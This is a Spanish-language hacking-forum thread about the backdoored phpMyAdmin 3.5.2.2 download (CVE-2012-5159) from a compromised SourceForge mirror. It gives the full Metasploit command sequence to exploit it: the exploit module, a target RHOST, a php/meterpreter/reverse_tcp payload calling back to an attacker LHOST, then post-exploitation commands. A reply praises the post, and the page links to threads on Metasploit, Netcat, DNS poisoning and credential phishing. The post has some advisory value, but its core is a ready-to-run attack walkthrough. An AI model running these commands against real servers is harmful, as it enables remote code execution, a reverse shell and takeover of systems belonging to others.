BackDoor en phpMyAdmin [Vídeo explotación con Metasploit]

  • 1 Respuestas
  • 3375 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stiuvert

  • *
  • Ex-Staff
  • *****
  • Mensajes: 2682
  • Actividad:
    0%
  • Reputación 15
  • Skype: [email protected]
  • Twitter: @Stiuvert
    • Ver Perfil
Recientemente se ha publicado un error de seguridad en phpMyAdmin, aunque en realidad el error de seguridad fue provocado por unos de los servidores de descarga de You are not allowed to view links. Register or Login.


El Mirror de descargas cdnetworks-kr-1 de SourceForge fue comprometido por atacantes malintencionados, quienes modificaron el fichero de descarga phpMyAdmin-3.5.2.2-all-languages.zip agregándole 2 archivos maliciosos que cumplen con el rol de Backdoor en el sistema, específicamente el archivo server_sync.php es el que permite a un atacante ejecutar remotamente código PHP.



A pesar de que recién ayer fue confirmada la vulnerabilidad, Metasploit ya hizo su trabajo (como siempre) y ya existe el You are not allowed to view links. Register or Login.



Aquí les dejo el vídeo de como explotar CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor con Metasploit:





use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid


También se recomienda a aquellos que tengan phpMyAdmin lo mejor es descargar y reinstalar phpMyAdmin para evitar cualquier tipo de problema.

Más Información:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Vídeo:
You are not allowed to view links. Register or Login

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5672
  • Actividad:
    20%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Buenismo man! Tremendo aporte!
+Karma!


 

"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 9642
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
[Video Tutorial] Tutorial de Netcat

Iniciado por Xc0d3's

Respuestas: 0
Vistas: 2240
Último mensaje Septiembre 02, 2017, 08:00:47 pm
por Xc0d3's
DNS Poisoning "Video"

Iniciado por REC

Respuestas: 2
Vistas: 3515
Último mensaje Mayo 26, 2012, 10:06:06 am
por Aryenal.Bt
Cheat-Sheet Metasploit Framework - Hoja guía para que no se me olvide

Iniciado por Denisse

Respuestas: 0
Vistas: 794
Último mensaje Junio 12, 2020, 01:12:59 am
por Denisse
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 5830
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral